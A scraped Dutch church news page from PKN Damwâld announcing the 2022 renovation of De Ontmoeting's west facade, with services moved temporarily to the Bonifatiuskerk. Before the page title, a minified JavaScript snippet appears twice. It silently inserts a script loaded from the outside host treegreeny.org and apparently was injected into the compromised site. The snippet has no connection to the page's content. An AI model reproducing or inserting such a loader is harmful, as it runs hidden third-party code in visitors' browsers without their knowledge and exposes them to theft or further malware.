;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Renovatie westgevel De Ontmoeting - PKN Damwâld

Renovatie westgevel De Ontmoeting

Gepubliceerd op: maandag 1 augustus 2022

De grote raampartij van de westgevel van De Ontmoeting is in zeer slechte staat. Dat is vast komen te staan na een uitgebreide inspectie van het kerkgebouw. Ook de in de arm genomen constructeur heeft het advies gegeven om op korte termijn een renovatieoperatie uit te voeren, omdat hij niet meer in kan staan voor een zware windbelasting van de gevel in de huidige staat.
Tijdens de laatstgehouden gemeentevergadering is e.e.a. uitgebreid aan de orde geweest. Inmiddels heeft de aanbesteding van het werk plaatsgevonden en is de planning van de uitvoering van het werk rond.
Omdat de renovatie een forse ingreep is, betekent dit dat de kerkzaal tijdens de werkzaamheden niet gebruikt kan worden voor de eredienst. Er zal in deze periode uitgeweken worden naar een kerkgebouw van de Hervormde Gemeente. Vanaf 21 augustus is het voornemen de morgendiensten in de Bonifatiuskerk te houden. Dit betekent dat de eerste dienst in De Ontmoeting na de renovatie op 16 oktober zal zijn.
Op de wekelijkse nieuwsbrief Tsjerkelûd zal gedurende de renovatieperiode steeds de actuele informatie over de locatie van de diensten worden vermeld.
De periode van sloop tot en met volledig herstel loopt van maandag 15 augustus tot en met begin oktober 2022. De eerste week voorafgaand aan het werk door de aannemer, zullen we met vrijwilligers voorbereidend werk moeten doen. Wij komen hiervoor graag bij jullie met de vraag om te helpen.
De aannemer begint 22 augustus met het werk.